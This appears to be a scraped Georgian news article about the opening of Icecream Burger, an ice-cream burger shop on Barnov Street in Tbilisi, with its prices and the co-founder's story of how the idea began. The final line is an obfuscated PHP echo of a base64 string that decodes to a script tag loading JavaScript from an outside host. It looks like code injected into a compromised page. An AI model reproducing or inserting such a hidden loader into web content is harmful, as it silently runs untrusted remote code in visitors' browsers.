celsiusi
ავერსი საქკაბელი
თბილისში, ბარნოვის ქუჩაზე, ახალი სანაყინე Icecream Burger გაიხსნა, რომელიც სხვა ასეთი ტიპის ობიექტებისგან განსხვავებით  მომხარებელს 5 სახეობის ნაყინის ბურგერს სთავაზობს, რომელთა შემადგენლობაშიც, ტკბილი ფუნთუშა, ნაყინი და სხვადასხვა შიგთავსი შედის. მომხმარებელს თავადაც შეუძლია მისთვის სასურველი კომბინაცია ააწყოს.
 
რაც შეეხება საფასო პოლიტიკას, დიდი ბურგერი 15, ხოლო პატარა 5 ლარი ღირს. ბურგერის შექმნის იდეასა და კომპანიის სამომავლო გეგმებზე bm.ge-სთან Icecream Burger-ის თანადამფუძნებელმა თორნიკე ბაღათურიამ ისაუბრა. მისი თქმით, სანაყინე ჯერჯერობით მხოლოდ ერთი ფილიალით არის წარმოდგენილი, თუმცა, სამომავლოდ გაფართოების გეგმაც აქვთ.
 
„გერმანიაში ჩემს იტალიელ მეგობარს შევხვდი, ფუნთუშას ჭამდა, რომლის შიგთავსიც აშკარად არ ჰგავდა ჯემს, რომ ვკითხე თუ რა იყო ეს უცნაური მასა იტალიური აქცენტით მიპასუხა: „Gelato inside”, გავსინჯე და ძალიან მომეწონა, აღმოჩნდა, რომ თავად გაუკეთებია, ამის შემდეგ გონებაში ეს იდეა ჩამრჩა, რომელიც მეგობრებსაც გავუზიარე. „Icecream Burger“-ში სრულად ჩვენ მიერ მოფიქრებულ ბურგერებს ვქმნით. საქართველოში პირველები ვართ, ვინც ამ პროდუქტს აწარმოებს, იმის მიუხედავად, რომ სულ რამდენიმე დღეა რაც გავიხსენით, მოთხოვნა მუდმივად იზრდება, თავიდან ყველას უკვირს ბურგერის შემადგენლობა, 80 %-ს ჰგონია, რომ ის პურისგან მზადდება, რეალურად კი ტკბილი ფუნთუშაა, რომელსაც პურთან არანაირი კავშირი არ აქვს“- ამბობს თორნიკე ბაღათურია.
1095
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");